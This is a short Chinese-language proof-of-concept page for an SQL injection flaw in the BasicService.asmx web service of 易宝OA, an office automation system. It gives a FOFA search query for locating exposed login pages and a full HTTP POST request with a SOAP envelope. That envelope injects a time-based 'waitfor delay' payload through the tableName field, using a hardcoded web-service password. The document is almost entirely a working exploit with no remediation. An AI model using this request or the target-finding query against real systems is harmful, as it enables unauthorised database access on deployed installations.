跳到主要内容

易宝OA-BasicService.asmx存在SQL注入漏洞

易宝OA-BasicService.asmx存在SQL注入漏洞

fofa

title="欢迎登录易宝OA系统"

poc

POST /WebService/BasicService.asmx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
SOAPAction: "http://tempuri.org/GetStreamID"
Content-Length: 85

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetStreamID xmlns="http://tempuri.org/">
<tableName>';waitfor delay '0:0:6'--+</tableName>
<webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
</GetStreamID>
</soap:Body>
</soap:Envelope>